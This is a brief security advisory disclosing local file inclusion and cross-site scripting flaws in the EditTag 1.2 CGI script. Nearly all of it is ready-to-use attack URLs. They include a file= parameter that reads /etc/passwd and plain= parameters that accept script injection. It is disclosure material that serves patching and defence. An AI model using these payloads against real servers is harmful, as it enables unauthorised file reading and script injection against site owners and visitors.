EditTag version 1.2 is susceptible to local file inclusion and cross site scripting vulnerabilities.
611985018b2e0090d997a65ae70399d12fdbc96f0a27b35288fc86b413167681
Script: EditTag
Version: 1.2
Author: Greg Billock (dmacewen@isn.net)
Discoverer: NetJackal (nima_501[4T]yAhoo[D0T]com - nj[4T]hackerz[D0T]ir)
I am sorry for my BAD English.
Description:
1) Local file injection:
An attacker can use edittag.cgi or edittag_mp.cgi (maybe .pl) to inject files (ex. /etc/passwd)
http://www.victim/edittag/edittag.cgi?file=INJECT
http://www.victim/edittag/edittag.pl?file=INJECT
http://www.victim/edittag/edittag_mp.cgi?file=INJECT
http://www.victim/edittag/edittag_mp.pl?file=INJECT
ex. http://www.victim/edittag/edittag_mp.pl?file=/etc/passwd
2)XSS
http://www.victim/edittag/mkpw_mp.cgi?plain=XSS
http://www.victim/edittag/mkpw.pl?plain=XSS
http://www.victim/edittag/mkpw.cgi?plain=XSS